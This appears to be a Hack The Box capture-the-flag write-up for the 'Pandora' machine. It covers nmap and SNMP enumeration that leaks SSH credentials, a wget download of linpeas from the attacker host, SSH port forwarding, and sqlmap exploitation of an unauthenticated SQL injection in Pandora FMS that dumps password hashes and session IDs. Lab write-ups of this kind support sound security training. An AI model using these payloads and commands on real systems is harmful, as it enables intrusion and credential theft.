HTB - Pandora
Nmap Scan
Lets perform nmap scan on the target machine,
┌──(kali㉿aidenpearce369)-[~]
└─$ nmap -sC -sV -A 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 10:51 EDT
Nmap scan report for 10.10.11.136
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Play | Landing
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.09 seconds
Finding other services,
┌──(kali㉿aidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 10.10.11.136
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 10:53 EDT
Warning: 10.10.11.136 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.136
Host is up (0.21s latency).
Not shown: 9995 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
1022/tcp filtered exp2
3996/tcp filtered abcsoftware
5091/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 149.09 seconds
So ssh and http are the only services running in this machine
Enumeration
We cannot access ssh because we dont know the credentials yet
Since we have http web service running on, we can try enumerating this
After browsing through the static web page,
I found that I’m able to pass request parameters on the email form, but that doesn’t lead a way
And there is hint on the webpage, suggesting us to create a hostname
Lets add a new hostname in our /etc/hosts file and perform a scan again
┌──(kali㉿aidenpearce369)-[~]
└─$ nmap -sC -sV -A panda.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 11:13 EDT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.22s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 24:c2:95:a5:c3:0b:3f:f3:17:3c:68:d7:af:2b:53:38 (RSA)
| 256 b1:41:77:99:46:9a:6c:5d:d2:98:2f:c0:32:9a:ce:03 (ECDSA)
|_ 256 e7:36:43:3b:a9:47:8a:19:01:58:b2:bc:89:f6:51:08 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Play | Landing
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 81.13 seconds
┌──(kali㉿aidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 panda.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 11:15 EDT
Warning: 10.10.11.136 giving up on port because retransmission cap hit (6).
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.21s latency).
Not shown: 9995 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
213/tcp filtered ipx
283/tcp filtered rescap
7753/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 133.54 seconds
Same results on doing nmap scan
By default it scans only TCP ports, lets scan UDP ports
┌──(kali㉿aidenpearce369)-[~]
└─$ sudo nmap -p1-300 -T4 panda.htb -sU
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-30 11:25 EDT
Nmap scan report for panda.htb (10.10.11.136)
Host is up (0.26s latency).
Not shown: 284 closed udp ports (port-unreach)
PORT STATE SERVICE
21/udp open|filtered ftp
72/udp open|filtered netrjs-2
73/udp open|filtered netrjs-3
84/udp open|filtered ctf
161/udp open snmp
165/udp open|filtered xns-courier
174/udp open|filtered mailq
202/udp open|filtered at-nbp
204/udp open|filtered at-echo
209/udp open|filtered tam
215/udp open|filtered softpc
260/udp open|filtered openport
261/udp open|filtered nsiiops
269/udp open|filtered manet
275/udp open|filtered unknown
286/udp open|filtered fxp
Nmap done: 1 IP address (1 host up) scanned in 300.09 seconds
snmp service is open
Enumerating SNMP
Since snmp uses UDP protocol, lets use snmpwalk to enumerate the information used by this protocol
┌──(kali㉿aidenpearce369)-[~]
└─$ snmpwalk -v 1 -c public 10.10.11.136 > snmp-enum.txt
...
┌──(kali㉿aidenpearce369)-[~]
└─$ cat snmp-enum.txt -n | grep '\-u'
739 iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/vmlinuz-5.4.0-91-generic root=/dev/mapper/ubuntu--vg-ubuntu--lv ro net.ifnames=0 biosdevname=0 maybe-ubiquity
1279 iso.3.6.1.2.1.25.4.2.1.2.517 = STRING: "systemd-udevd"
1689 iso.3.6.1.2.1.25.4.2.1.4.517 = STRING: "/lib/systemd/systemd-udevd"
1735 iso.3.6.1.2.1.25.4.2.1.5.1 = STRING: "maybe-ubiquity"
1914 iso.3.6.1.2.1.25.4.2.1.5.898 = STRING: "-c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'"
1916 iso.3.6.1.2.1.25.4.2.1.5.902 = STRING: "-LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid"
1923 iso.3.6.1.2.1.25.4.2.1.5.1100 = STRING: "-u daniel -p HotelBabylon23"
Alternatively, we can use metasploit module to perform SNMP enumeration
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 10.10.11.136
RHOSTS => 10.10.11.136
msf6 auxiliary(scanner/snmp/snmp_enum) > run
[+] 10.10.11.136, Connected.
[*] System information:
Host IP : 10.10.11.136
Hostname : pandora
Description : Linux pandora 5.4.0-91-generic #102-Ubuntu SMP Fri Nov 5 16:31:28 UTC 2021 x86_64
Contact : Daniel
Location : Mississippi
Uptime snmp : 01:10:29.61
Uptime system : 01:10:16.49
System date : 2022-3-30 16:05:12.0
[*] Network information:
IP forwarding enabled : no
Default TTL : 64
TCP segments received : 176958
TCP segments sent : 178677
TCP segments retrans : 1338
Input datagrams : 184979
Delivered datagrams : 184979
Output datagrams : 187172
...
672 unknown ext4-rsv-conver
686 runnable systemd-resolve /lib/systemd/systemd-resolved
687 runnable systemd-timesyn /lib/systemd/systemd-timesyncd
696 runnable VGAuthService /usr/bin/VGAuthService
697 runnable vmtoolsd /usr/bin/vmtoolsd
757 runnable accounts-daemon /usr/lib/accountsservice/accounts-daemon
758 runnable dbus-daemon /usr/bin/dbus-daemon--system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
762 runnable irqbalance /usr/sbin/irqbalance--foreground
766 runnable networkd-dispat /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
767 runnable rsyslogd /usr/sbin/rsyslogd -n -iNONE
772 runnable systemd-logind /lib/systemd/systemd-logind
773 runnable udisksd /usr/lib/udisks2/udisksd
828 runnable polkitd /usr/lib/policykit-1/polkitd--no-debug
870 runnable cron /usr/sbin/cron -f
880 runnable cron /usr/sbin/CRON -f
898 runnable sh /bin/sh -c sleep 30; /bin/bash -c '/usr/bin/host_check -u daniel -p HotelBabylon23'
901 runnable atd /usr/sbin/atd -f
902 running snmpd /usr/sbin/snmpd -LOw -u Debian-snmp -g Debian-snmp -I -smux mteTrigger mteTriggerConf -f -p /run/snmpd.pid
903 runnable sshd sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups
959 runnable agetty /sbin/agetty -o -p -- \u --noclear tty1 linux
968 runnable apache2 /usr/sbin/apache2 -k start
1017 runnable mysqld /usr/sbin/mysqld
1018 runnable apache2 /usr/sbin/apache2 -k start
1019 runnable apache2 /usr/sbin/apache2 -k start
1100 runnable host_check /usr/bin/host_check -u daniel -p HotelBabylon23
1189 runnable apache2 /usr/sbin/apache2 -k start
1209 runnable apache2 /usr/sbin/apache2 -k start
1215 runnable apache2 /usr/sbin/apache2 -k start
1502 unknown kworker/1:0-events
1831 runnable apache2 /usr/sbin/apache2 -k start
1842 runnable apache2 /usr/sbin/apache2 -k start
2064 runnable apache2 /usr/sbin/apache2 -k start
2065 runnable apache2 /usr/sbin/apache2 -k start
2280 unknown kworker/u4:1-events_power_efficient
2514 unknown kworker/u4:2-events_power_efficient
2515 unknown kworker/0:0-events
2518 unknown kworker/1:2-events
2977 runnable apache2 /usr/sbin/apache2 -k start
3266 unknown kworker/1:1-events
3267 unknown kworker/1:3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
From this information, we have a credential -u daniel -p HotelBabylon23'
Gaining Foothold
Lets try to login via SSH
┌──(kali㉿aidenpearce369)-[~]
└─$ ssh daniel@panda.htb
The authenticity of host 'panda.htb (10.10.11.136)' can't be established.
ED25519 key fingerprint is SHA256:yDtxiXxKzUipXy+nLREcsfpv/fRomqveZjm6PXq9+BY.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'panda.htb' (ED25519) to the list of known hosts.
daniel@panda.htb's password:
Welcome to Ubuntu 20.04.3 LTS (GNU/Linux 5.4.0-91-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Wed 30 Mar 16:16:55 UTC 2022
System load: 0.0
Usage of /: 63.3% of 4.87GB
Memory usage: 8%
Swap usage: 0%
Processes: 231
Users logged in: 0
IPv4 address for eth0: 10.10.11.136
IPv6 address for eth0: dead:beef::250:56ff:feb9:e7c7
=> /boot is using 91.8% of 219MB
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
daniel@pandora:~$ id
uid=1001(daniel) gid=1001(daniel) groups=1001(daniel)
daniel@pandora:~$ whoami
daniel
Now we dont have permission to read the user flag,
daniel@pandora:/home$ ls
daniel matt
daniel@pandora:/home$ cd matt
daniel@pandora:/home/matt$ ls
user.txt
daniel@pandora:/home/matt$ cat user.txt
cat: user.txt: Permission denied
daniel@pandora:/home/matt$
Trying standard privilege escalation techniques, got some SUID binaries
daniel@pandora:~$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/pandora_backup
/usr/bin/passwd
/usr/bin/mount
/usr/bin/su
/usr/bin/at
/usr/bin/fusermount
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/pandora_backup seems interesting and /usr/bin/at can be used to bypass restricted shell
daniel@pandora:~$ ls -l /usr/bin/at
-rwsr-sr-x 1 daemon daemon 55560 Nov 12 2018 /usr/bin/at
daniel@pandora:~$ ls -l /usr/bin/pandora_backup
-rwsr-x--- 1 root matt 16816 Dec 3 15:58 /usr/bin/pandora_backup
The second user matt can run /usr/bin/pandora_backup, so we need to get to matt
Downloading linpeas.sh from our attacker machine,
daniel@pandora:~$ wget http://10.10.14.5:8000/linpeas.sh
--2022-03-30 16:21:53-- http://10.10.14.5:8000/linpeas.sh
Connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 775707 (758K) [text/x-sh]
Saving to: ‘linpeas.sh’
linpeas.sh 100%[============================================================================>] 757.53K 458KB/s in 1.7s
2022-03-30 16:21:55 (458 KB/s) - ‘linpeas.sh’ saved [775707/775707]
By running linPEAS , it shows sudo version is 1.8.31 which is vulnerable
daniel@pandora:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31
daniel@pandora:~$ which python3
/usr/bin/python3
daniel@pandora:~$ python3 exploit_nss.py
Traceback (most recent call last):
File "exploit_nss.py", line 220, in <module>
assert check_is_vuln(), "target is patched"
AssertionError: target is patched
But running the exploit showed it is patched
On running process list, there were many apache process and a mysql process
daniel@pandora:/var$ ps -aux
...
root 968 0.0 0.7 227944 30768 ? Ss 14:54 0:00 /usr/sbin/apache2 -k start
mysql 1017 0.0 2.3 1710488 93948 ? Ssl 14:54 0:03 /usr/sbin/mysqld
www-data 1018 0.0 0.3 228348 14380 ? S 14:54 0:00 /usr/sbin/apache2 -k start
www-data 1019 0.0 0.3 228348 14380 ? S 14:54 0:00 /usr/sbin/apache2 -k start
root 1100 0.0 0.0 2488 1388 ? S 14:55 0:00 /usr/bin/host_check -u daniel -p HotelBabylon23
www-data 1189 0.0 0.3 228348 14384 ? S 14:58 0:00 /usr/sbin/apache2 -k start
www-data 1209 0.0 0.3 228348 14384 ? S 15:00 0:00 /usr/sbin/apache2 -k start
www-data 1215 0.0 0.3 228348 14384 ? S 15:00 0:00 /usr/sbin/apache2 -k start
www-data 1831 0.0 0.3 228348 14384 ? S 15:18 0:00 /usr/sbin/apache2 -k start
www-data 1842 0.0 0.3 228348 14384 ? S 15:18 0:00 /usr/sbin/apache2 -k start
www-data 2064 0.0 0.3 228348 14384 ? S 15:26 0:00 /usr/sbin/apache2 -k start
www-data 2065 0.0 0.3 228348 14384 ? S 15:26 0:00 /usr/sbin/apache2 -k start
www-data 2977 0.0 0.3 228348 14384 ? S 15:58 0:00 /usr/sbin/apache2 -k start
We could not access mysql with our current user creds
daniel@pandora:/var$ mysql -u daniel -p
Enter password:
ERROR 1045 (28000): Access denied for user 'daniel'@'localhost' (using password: YES)
Since there are many apache processes running behind, after enumerating it seems like there are two web apps running in this machine
daniel@pandora:/var/www$ ls
html pandora
daniel@pandora:/var/www$ ls html/
assets index.html
daniel@pandora:/var/www$ ls pandora/
index.html pandora_console
daniel@pandora:/var/www$ cat /etc/hosts
127.0.0.1 localhost.localdomain pandora.htb pandora.pandora.htb
127.0.1.1 pandora
# The following lines are desirable for IPv6 capable hosts
::1 ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Testing it with curl command,
daniel@pandora:/var/www$ curl localhost
<meta HTTP-EQUIV="REFRESH" content="0; url=/pandora_console/">
daniel@pandora:/var/www$ curl http://localhost/pandora_console
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://localhost/pandora_console/">here</a>.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at localhost Port 80</address>
</body></html>
daniel@pandora:/var/www$ curl http://localhost/pandora_console/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
...
So there is an another web app running internally
To access this web app, we need port forwarding which can be done by ssh
┌──(kali㉿aidenpearce369)-[~]
└─$ ssh -L 8081:127.0.0.1:80 -N daniel@panda.htb
daniel@panda.htb's password:
Now we can access the web app on port 8081 of our local machine
We can access the internal web app locally now
Privilege Escalation
We have a login page right infront of us,
Tried generic SQLi payload, but it did not work
From the given information on site, it is running Pandora FMS with version of v7.0NG742
Lets search for exploit for this specific version,
┌──(kali㉿aidenpearce369)-[~]
└─$ searchsploit pandora 7.0
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Pandora 7.0NG - Remote Code Execution | php/webapps/47898.py
Pandora FMS 7.0 NG 749 - 'CG Items' SQL Injection (Authenticated) | php/webapps/49046.txt
Pandora FMS 7.0 NG 749 - Multiple Persistent Cross-Site Scripting Vulnerabilities | php/webapps/49139.txt
Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated) | php/webapps/49312.txt
Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution | php/webapps/48280.py
PANDORAFMS 7.0 - Authenticated Remote Code Execution | php/webapps/48064.py
PandoraFMS 7.0 NG 746 - Persistent Cross-Site Scripting | php/webapps/48707.txt
PandoraFMS NG747 7.0 - 'filename' Persistent Cross-Site Scripting | php/webapps/48700.txt
--------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
But googling the specific version number, the first link will give interesting results
This version has Unauthenticated SQLi, since we have mysql running lets try this,
Exploit referred to this CMS, where this SQLi is an Union based attack
Lets run sqlmap on the vulnerable URI
┌──(kali㉿aidenpearce369)-[~]
└─$ sqlmap --url="http://localhost:8081/pandora_console/include/chart_generator.php?session_id=''" --dbms=mysql --dump
___
__H__
___ ___[.]_____ ___ ___ {1.6.3#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:13:19 /2022-03-30/
[13:13:19] [INFO] testing connection to the target URL
[13:13:19] [WARNING] potential permission problems detected ('Access denied')
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=koihrjg9bqn...s4mdrdmie7'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: session_id=-5176' OR 2190=2190#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: session_id=''' OR (SELECT 2464 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2464=2464,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IdPE
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: session_id=''' AND (SELECT 2215 FROM (SELECT(SLEEP(5)))mPZg)-- gdEY
---
[13:13:22] [INFO] testing MySQL
[13:13:22] [INFO] confirming MySQL
[13:13:23] [WARNING] reflective value(s) found and filtering out
[13:13:23] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.04 or 20.10 (focal or eoan)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:13:23] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[13:13:23] [INFO] fetching current database
[13:13:23] [INFO] retrieved: 'pandora'
[13:13:23] [INFO] fetching tables for database: 'pandora'
...
We have found the database name is pandora
Dumping the tpassword_history table,
┌──(kali㉿aidenpearce369)-[~]
└─$ sqlmap --url="http://localhost:8081/pandora_console/include/chart_generator.php?session_id=''" --dbms=mysql -D pandora -T tpassword_history --dump
___
__H__
___ ___[(]_____ ___ ___ {1.6.3#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:26:11 /2022-03-30/
[13:26:11] [INFO] testing connection to the target URL
[13:26:11] [WARNING] potential permission problems detected ('Access denied')
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=6up1pgja7ic...uoqu641vi3'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: session_id=-5176' OR 2190=2190#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: session_id=''' OR (SELECT 2464 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2464=2464,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IdPE
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: session_id=''' AND (SELECT 2215 FROM (SELECT(SLEEP(5)))mPZg)-- gdEY
---
[13:26:13] [INFO] testing MySQL
[13:26:13] [INFO] confirming MySQL
[13:26:14] [WARNING] reflective value(s) found and filtering out
[13:26:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 19.10 or 20.10 or 20.04 (eoan or focal)
web application technology: Apache 2.4.41, PHP
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:26:14] [INFO] fetching columns for table 'tpassword_history' in database 'pandora'
[13:26:14] [INFO] resumed: 'id_pass'
[13:26:14] [INFO] resumed: 'int(10) unsigned'
[13:26:14] [INFO] resumed: 'id_user'
[13:26:14] [INFO] resumed: 'varchar(60)'
[13:26:14] [INFO] resumed: 'password'
[13:26:14] [INFO] resumed: 'varchar(45)'
[13:26:14] [INFO] resumed: 'date_begin'
[13:26:14] [INFO] resumed: 'datetime'
[13:26:14] [INFO] resumed: 'date_end'
[13:26:14] [INFO] resumed: 'datetime'
[13:26:14] [INFO] fetching entries for table 'tpassword_history' in database 'pandora'
[13:26:14] [INFO] resumed: '2021-06-11 17:28:54'
[13:26:14] [INFO] resumed: '0000-00-00 00:00:00'
[13:26:14] [INFO] resumed: '1'
[13:26:14] [INFO] resumed: 'matt'
[13:26:14] [INFO] resumed: 'f655f807365b6dc602b31ab3d6d43acc'
[13:26:14] [INFO] resumed: '2021-06-17 00:11:54'
[13:26:14] [INFO] resumed: '0000-00-00 00:00:00'
[13:26:14] [INFO] resumed: '2'
[13:26:14] [INFO] resumed: 'daniel'
[13:26:14] [INFO] resumed: '76323c174bd49ffbbdedf678f6cc89a6'
[13:26:14] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] n
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: pandora
Table: tpassword_history
[2 entries]
+---------+---------+---------------------+----------------------------------+---------------------+
| id_pass | id_user | date_end | password | date_begin |
+---------+---------+---------------------+----------------------------------+---------------------+
| 1 | matt | 0000-00-00 00:00:00 | f655f807365b6dc602b31ab3d6d43acc | 2021-06-11 17:28:54 |
| 2 | daniel | 0000-00-00 00:00:00 | 76323c174bd49ffbbdedf678f6cc89a6 | 2021-06-17 00:11:54 |
+---------+---------+---------------------+----------------------------------+---------------------+
[13:26:19] [INFO] table 'pandora.tpassword_history' dumped to CSV file '/home/kali/.local/share/sqlmap/output/localhost/dump/pandora/tpassword_history.csv'
[13:26:19] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/localhost'
[*] ending @ 13:26:19 /2022-03-30/
Dumping values from tsession_php table,
┌──(kali㉿aidenpearce369)-[~]
└─$ sqlmap --url="http://localhost:8081/pandora_console/include/chart_generator.php?session_id=''" --dbms=mysql -D pandora -T tsessions_php --dump
___
__H__
___ ___[,]_____ ___ ___ {1.6.3#stable}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:27:32 /2022-03-30/
[13:27:32] [INFO] testing connection to the target URL
[13:27:33] [WARNING] potential permission problems detected ('Access denied')
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=92h891j6qs1...2e4r9vlg39'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: session_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: session_id=-5176' OR 2190=2190#
Type: error-based
Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: session_id=''' OR (SELECT 2464 FROM(SELECT COUNT(*),CONCAT(0x71766a6271,(SELECT (ELT(2464=2464,1))),0x7171626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IdPE
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: session_id=''' AND (SELECT 2215 FROM (SELECT(SLEEP(5)))mPZg)-- gdEY
---
[13:27:34] [INFO] testing MySQL
[13:27:34] [INFO] confirming MySQL
[13:27:35] [WARNING] reflective value(s) found and filtering out
[13:27:35] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.10 or 20.04 or 19.10 (eoan or focal)
web application technology: PHP, Apache 2.4.41
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
[13:27:35] [INFO] fetching columns for table 'tsessions_php' in database 'pandora'
...
Database: pandora
Table: tsessions_php
[56 entries]
+----------------------------+-----------------------------------------------------+-------------+
| id_session | data | last_active |
+----------------------------+-----------------------------------------------------+-------------+
| 09vao3q1dikuoi1vhcvhcjjbc6 | id_usuario|s:6:"daniel"; | 1638783555 |
| 0ahul7feb1l9db7ffp8d25sjba | NULL | 1638789018 |
| 130or2fa7sjfo5alc260nutu0t | id_usuario|s:6:"daniel"; | 1648652125 |
| 1cqctk2bd1goq81nog694bmsdg | id_usuario|s:6:"daniel"; | 1648660609 |
| 1um23if7s531kqf5da14kf5lvm | NULL | 1638792211 |
| 2e25c62vc3odbppmg6pjbf9bum | NULL | 1638786129 |
| 346uqacafar8pipuppubqet7ut | id_usuario|s:6:"daniel"; | 1638540332 |
| 3me2jjab4atfa5f8106iklh4fc | NULL | 1638795380 |
| 4f51mju7kcuonuqor3876n8o02 | NULL | 1638786842 |
| 4nsbidcmgfoh1gilpv8p5hpi2s | id_usuario|s:6:"daniel"; | 1638535373 |
| 59qae699l0971h13qmbpqahlls | NULL | 1638787305 |
| 5fihkihbip2jioll1a8mcsmp6j | NULL | 1638792685 |
| 5g6l76p4mncnest9ot5hr7opv1 | id_usuario|s:5:"admin"; | 1648660377 |
| 5i352tsdh7vlohth30ve4o0air | id_usuario|s:6:"daniel"; | 1638281946 |
| 69gbnjrc2q42e8aqahb1l2s68n | id_usuario|s:6:"daniel"; | 1641195617 |
| 6up1pgja7ic6tti8uoqu641vi3 | NULL | 1648661423 |
| 7cv0ph58mnnfpu45mh9mj3nv0v | NULL | 1648661212 |
| 81f3uet7p3esgiq02d4cjj48rc | NULL | 1623957150 |
| 8m2e6h8gmphj79r9pq497vpdre | id_usuario|s:6:"daniel"; | 1638446321 |
| 8upeameujo9nhki3ps0fu32cgd | NULL | 1638787267 |
| 92h891j6qs18hn1k2e4r9vlg39 | NULL | 1648661546 |
| 9dn1mbgeq1fljfhjsh9sk80asl | NULL | 1648661124 |
| 9vv4godmdam3vsq8pu78b52em9 | id_usuario|s:6:"daniel"; | 1638881787 |
| a3a49kc938u7od6e6mlip1ej80 | NULL | 1638795315 |
| agfdiriggbt86ep71uvm1jbo3f | id_usuario|s:6:"daniel"; | 1638881664 |
| amn2o2cejcplib5qgjdv8cl2l6 | NULL | 1648659314 |
| cojb6rgubs18ipb35b3f6hf0vp | NULL | 1638787213 |
| d0carbrks2lvmb90ergj7jv6po | NULL | 1638786277 |
| d59vtcusej59n46nn82rnv78n0 | NULL | 1648658750 |
| f0qisbrojp785v1dmm8cu1vkaj | id_usuario|s:6:"daniel"; | 1641200284 |
| fikt9p6i78no7aofn74rr71m85 | NULL | 1638786504 |
| fqd96rcv4ecuqs409n5qsleufi | NULL | 1638786762 |
| g0kteepqaj1oep6u7msp0u38kv | id_usuario|s:6:"daniel"; | 1638783230 |
| g4e01qdgk36mfdh90hvcc54umq | id_usuario|s:4:"matt";alert_msg|a:0:{}new_chat|b:0; | 1638796349 |
| gf40pukfdinc63nm5lkroidde6 | NULL | 1638786349 |
| heasjj8c48ikjlvsf1uhonfesv | NULL | 1638540345 |
| hhjlv9j3fvb96gurpogjkg10jb | id_usuario|s:5:"admin"; | 1648660258 |
| hsftvg6j5m3vcmut6ln6ig8b0f | id_usuario|s:6:"daniel"; | 1638168492 |
| j2bo9tvhgn1e6sb5u03p8101hc | NULL | 1648661270 |
| jecd4v8f6mlcgn4634ndfl74rd | id_usuario|s:6:"daniel"; | 1638456173 |
| koihrjg9bqn35hjos4mdrdmie7 | id_usuario|s:6:"daniel"; | 1648660800 |
| kp90bu1mlclbaenaljem590ik3 | NULL | 1638787808 |
| ne9rt4pkqqd0aqcrr4dacbmaq3 | NULL | 1638796348 |
| o3kuq4m5t5mqv01iur63e1di58 | id_usuario|s:6:"daniel"; | 1638540482 |
| oc1um2oum4n98a6d7fku241r56 | NULL | 1648660640 |
| oi2r6rjq9v99qt8q9heu3nulon | id_usuario|s:6:"daniel"; | 1637667827 |
| pjigpi88mlmmkllqfqh4ap2kmr | NULL | 1648661225 |
| pjp312be5p56vke9dnbqmnqeot | id_usuario|s:6:"daniel"; | 1638168416 |
| q9oqum7kba0n0pip0626gjluea | NULL | 1648659478 |
| qq8gqbdkn8fks0dv1l9qk6j3q8 | NULL | 1638787723 |
| r097jr6k9s7k166vkvaj17na1u | NULL | 1638787677 |
